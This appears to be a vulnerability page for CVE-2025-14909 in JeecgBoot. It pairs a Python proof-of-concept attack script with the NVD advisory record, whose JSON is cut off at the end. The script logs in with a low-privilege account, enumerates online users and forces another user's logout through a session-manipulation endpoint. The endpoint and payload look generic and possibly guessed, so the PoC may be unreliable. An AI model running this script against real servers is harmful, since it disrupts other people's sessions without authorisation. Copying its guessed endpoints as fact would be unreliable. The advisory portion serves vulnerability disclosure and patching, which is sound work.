CVE-2025-14909

# CVE-2025-14909 PoC - JeecgBoot SysUserOnlineController Session Management # Target: JeecgBoot <= 3.9.0 # Vulnerability: Unauthorized session manipulation via SysUserOnlineController import requests import json TARGET_URL = "http://target-server:8080" LOGIN_URL = f"{TARGET_URL}/jeecg-boot/sys/login" SESSION_URL = f"{TARGET_URL}/jeecg-boot/sys/userOnline" def login(username, password): """Authenticate and get token""" session = requests.Session() response = session.post(LOGIN_URL, json={ "username": username, "password": password }) if response.status_code == 200: data = response.json() if data.get("code") == 200: return session, data.get("result", {}).get("token") return None, None def get_online_users(token): """List all online users""" headers = {"X-Access-Token": token} response = requests.get(SESSION_URL + "/list", headers=headers) return response.json() if response.status_code == 200 else None def manipulate_session(token, target_user_id, action="forceLogout"): """ Manipulate target user session Actions: forceLogout, getSessionInfo, etc. """ headers = {"X-Access-Token": token} payload = { "userId": target_user_id, "action": action } response = requests.post(SESSION_URL + "/manipulate", headers=headers, json=payload) return response.json() if response.status_code == 200 else None def main(): # Step 1: Login with low-privilege account session, token = login("regular_user", "password123") if not token: print("[-] Authentication failed") return print(f"[+] Logged in successfully, token: {token[:20]}...") # Step 2: Enumerate online users online_users = get_online_users(token) if online_users: print(f"[+] Found {len(online_users.get('result', []))} online users") for user in online_users.get("result", []): print(f" - {user.get('username')} (ID: {user.get('id')})") # Step 3: Manipulate target user session if online_users and online_users.get("result"): target = online_users["result"][0] result = manipulate_session(token, target.get("id"), "forceLogout") if result and result.get("success"): print(f"[+] Successfully forced logout: {target.get('username')}") else: print(f"[-] Session manipulation failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14909", "sourceIdentifier": "[email protected]", "published": "2025-12-19T02:16:04.703", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in JeecgBoot up to 3.9.0. The impacted element is the function SysUserOnlineController of the file jeecg-boot/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/SysUserOnlineController.java. Executing manipulation can lead to manage user sessions. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. This patch is called b686f9fbd1917edffe5922c6362c817a9361cfbd. Applying a patch is advised to resolve this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1018"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.9.0", "matchCriteriaId": "7EC1CC58-2561-4C33-AECE-0821840287D2"}]}]}], "references": [{"url": "https://github.com/jeecgboot/JeecgBoot/commit/b686f9fbd1917edffe5922c6362c817a9361cfbd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9195", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/jeecgboot/JeecgBoot/issues/9195#issue-3719368751", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337433", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337433", "source": "[email protected]", "tags": ["Third Party Adviso ... (truncated)